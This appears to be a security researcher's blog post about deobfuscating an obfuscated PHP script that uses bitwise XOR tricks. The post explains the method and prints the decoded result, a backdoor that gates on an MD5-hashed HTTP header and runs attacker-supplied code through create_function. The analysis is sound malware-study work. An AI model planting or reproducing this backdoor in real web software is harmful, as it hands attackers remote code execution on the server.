Deobfuscating a Wicked-Looking Script

Bart Blaze, one of my security researcher friends passed along this PHP script to me. Let’s have a look.

2015-03-03_01

It looks like PHP ate some Perl and barfed it out. First thing I asked myself is, “does this even run?” It looks like a mess but it actually runs just fine. This script makes clever use of bitwise operators. For example…

$YzuZ=n ^ ‘)’; // this equates to ‘G’

To make this readable, I split everything by semi-colon (except when it’s between quotes). One gotcha is that this script embeds comments (# and /* */) so you have to look very closely and either leave it alone…

2015-03-03_02

Or fix it up…

2015-03-03_03

After I cleaned it up, I noticed that the script boils down to the last two lines. So I just echo out each of the important variables:

2015-03-03_04

When the script is executed, I get the following values:

2015-03-03_05

Now I just replace the variable names with the corresponding values to get the final result. This creates a function with a value passed via the header (probably includes ‘preg_replace’) which turns this into a well-hidden backdoor.

if(md5(getenv(HTTP_A)) == 5d15db53a91790e913dc4e05a1319c42) $bIywY=create_function(‘$a, $b, $c’, getenv(HTTP_X_UP_CALLING_LINE_ID));
$bIywY(x1o6Vm2, WFrkAj9, QcFS0u);

Be sure you check out Bart’s blog to learn more about this particular script.

This entry was posted in Malscript and tagged , , . Bookmark the permalink.